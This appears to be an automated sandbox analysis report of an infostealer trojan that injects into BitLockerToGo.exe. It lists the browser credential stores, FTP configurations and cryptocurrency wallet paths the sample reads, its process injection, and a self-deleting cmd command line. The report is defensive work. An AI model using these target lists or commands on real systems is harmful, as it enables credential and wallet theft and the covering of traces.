              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00406784
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_00411187
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00412A5D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_00409C78
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00408224
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00412539
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00411BD2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00411722
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040DF8C GetSystemInfo,wsprintfA,4_2_0040DF8C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: chrome.exe, 00000005.00000002.2179515803.00006D8C00B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
              Source: chrome.exe, 00000005.00000002.2176447902.00006D8C0076C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=b08baaaa-679d-4942-8197-469d6c24be2e
              Source: chrome.exe, 00000005.00000002.2182189334.00006D8C01054000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2690119117.00000000032D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1974946992.0000000001008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: chrome.exe, 00000005.00000002.2169048086.000001B2683B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-12247
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-12153
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-11859
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040D84A lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrcpyA,lstrcatA,4_2_0040D84A

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,4_2_0040F029
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,4_2_0040F0CA
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2FF1008Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 419000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 420000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 421000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\srq9h" & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_0040DE1C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00417842 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,4_2_00417842
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00414CDB EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,4_2_00414CDB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_0040DDBF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe PID: 6544, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 3704, type: MEMORYSTR
              Source: BitLockerToGo.exe, 00000004.00000002.2689646012.0000000003064000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *electrum*.*
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
              Source: BitLockerToGo.exe, 00000004.00000002.2689646012.0000000003064000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *exodus*.*
              Source: BitLockerToGo.exe, 00000004.00000002.2689646012.0000000003064000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *ethereum*.*
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
              Source: Yara match File source: 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 3704, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 2 Native API; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: 1 DLL Side-Loading; 1 Create Account; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: 1 DLL Side-Loading; 1 Extra Window Memory Injection; 411 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 11 Masquerading; 1 Virtualization/Sandbox Evasion; 411 Process Injection; Indicator Removal from Tools
              Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 2 System Time Discovery; 1 Account Discovery; 4 File and Directory Discovery; 35 System Information Discovery; 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: 1 Archive Collected Data; 4 Data from Local System; 1 Screen Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 1 Remote Access Software; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              [Behavior graph (ID 1610535, start date 09/02/2025, architecture WINDOWS, score 100): SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe writes to and injects a PE file into BitLockerToGo.exe, which contacts safewat.pro (5.75.215.154:443) and t.me (149.154.167.99:443), drops C:\ProgramData\srq9h\wtjw4e (PE32+), and starts chrome.exe and cmd.exe (conhost.exe, timeout.exe).]

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.